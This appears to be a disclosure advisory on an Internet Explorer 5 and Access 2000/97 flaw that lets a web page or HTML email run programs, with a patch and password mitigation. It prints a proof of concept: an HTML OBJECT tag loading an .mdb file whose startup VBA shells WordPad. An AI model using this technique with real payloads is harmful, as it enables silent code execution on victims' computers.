COMMAND

    IE

SYSTEMS AFFECTED

    IE 5 and Access 2000, 97

PROBLEM

    Georgi  Guninski  found  following.   Internet  Explorer  5.01 and
    Access  2000  under  Windows  98  (suppose other versions are also
    vulnerable) allow executing  programs when viewing  a web page  or
    HTML  email  message  -  (in  the  latter case with IFRAME).  This
    allows taking full control over user's computer.

    Access 2000 allows executing VBA  code which has access to  system
    resources and in  particular executing files.   It is possible  to
    silently open and execute .mdb file from IE with the code:

        <OBJECT data="db3.mdb" id="d1"></OBJECT>

    This allows executing VBA code from Access 2000, though it is  not
    visible to the user.

    The code is:

    -----------access.html----------------------------
    <OBJECT data="db3.mdb" id="d1"></OBJECT>
    -----------in Form1 of db3.mdb---------------------
    Private Sub Form_Load()
    On Error GoTo Err_Command0_Click
        Dim stAppName As String
        stAppName = "C:\Program Files\Accessories\wordpad.exe"
        MsgBox ("Trying to start: " & stAppName)
        Call Shell(stAppName, 1)

    Exit_Command0_Click:
        Exit Sub

    Err_Command0_Click:
        MsgBox Err.Description
        Resume Exit_Command0_Click
    End Sub

    Form1 is automatically opened at database startup.   Demonstration
    is available at:

        http://www.nat.bg/~joro/access.html

    Jesper M. Johansson  also discovered a  serious problem here.   He
    has IE set to prompt on running ActiveX controls.  It does  prompt
    him; but  not until  AFTER it  already downloaded  and opened  the
    Access database.  Even disabling ActiveX controls altogether  does
    not solve this!  Disabling Active Scripting does not help  either.
    Let us put this another way: there appears to be no way to use the
    security settings in IE to guard against this problem!

    For  a  Win95,  IE5,  Access97  version  of  access.html   (starts
    notepad), see:

        http://noomore.org/msa/access.html

    By the way, this flaw also works with Visio 2000.

SOLUTION

    Assigning  a  password  to  the  Administrator user in Access 2000
    will help protect  against this vulnerability.   It will at  least
    bring up a login dialog when it tries to open the database.

    Patch availability:

        http://officeupdate.microsoft.com/2000/downloaddetails/Addinsec.htm
        http://officeupdate.microsoft.com/downloaddetails/PPt97sec.htm